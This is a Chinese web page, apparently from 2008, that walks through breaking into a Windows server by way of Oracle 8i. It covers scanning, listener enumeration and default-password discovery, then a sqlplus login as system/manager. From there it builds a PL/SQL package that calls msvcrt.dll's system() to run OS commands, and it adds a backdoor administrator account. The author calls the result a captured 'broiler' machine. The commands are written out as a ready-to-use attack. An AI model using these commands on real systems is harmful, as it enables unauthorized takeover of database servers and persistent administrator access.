当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 通过Oracle8i入侵系统全过程(图)

通过Oracle8i入侵系统全过程(图)

2008年10月08日 脚本攻防 我要评论
通过Oracle8i入侵系统全过程(图) 最近看了些有关 Oracle 的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅.。先用 SuperScan4.0 扫描下要测试的主机,速度很快,结果如图 1 所示: 图 1 ... 08-10-08
通过输入"status "命令我们可以得到 oracle 详细版本(8.1.70.0),操作系统(windows),跟踪级别为 off(说明没 有开启审核),安全性为 off(说明没有设置 listener 口令),日志文件的绝对路径(判断 oracle 安装路径),数据库的 sid(ccdr).

要远程管理 oracle, 需要知道 ip,数据库的 sid,和连接的用户名和密码.ip 和 sid 我们已经知道了. 接下来用oscanner 工具扫描下要测试主机是否存在默认的密码.如图 4 所示.



图 4

看来 管 理 员 安 装 完 oracle8i 后就 没 有 进 行 进 一 步 的 安 全 配 置 , 所有 的 用 户 名 密 码 都 是 默 认 的 . 在

oracle 中,sys/system 都是具有 dba 权限的帐户,我这里选择使用 system/ma nager 来连接数据库.

在本地用 sqlplus 连接到目标 oracle 数据库,命令为:

sqlplus system/manager@//victimip:1521/ccdr,

连接成功 后,可以通过 pl/sql 来运行 os 命令,首先需要创建库来定位 msvcrt.dll 文件.这里需要使用完整的路径,通过刚才

对主机的 查点 我们 已经 知道 操作 系统为 win2003, 如果系统 安装 到 c 盘的话 , 那 msvcrt.dll 默认路径 就为

c:\windows\system32\msvcrt.dll.创建库的命令如下:

create or replace library exec_shell as ’c:\windows\system32\msvcrt.dll’;

接下来写一个过程来调用 msvcrt.dll 里的 system()函数.命令如下:

create or replace package oracmd is

procedure exec (cmdstring in char);

end oracmd;

/

create ore replace package body oracmd is

procedure exec (cmdstring in char)

is external

name "system"

library exec_shell

language c;

end oracmd;

/

创建完后,就可以运行 os 命令了.由于主机已经开放了终端服务,所以我这里添加个管理员,然后连接服务器.命 令如下:

exec oracmd.exec (’net user mickey imissyou /add’);

exec oracmd.exec (’net localgroup administrators mickey /add’);

帐户创建完成后,如图 5,就可以连接终端服务了,一台肉鸡到手了.:-)



图 5
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com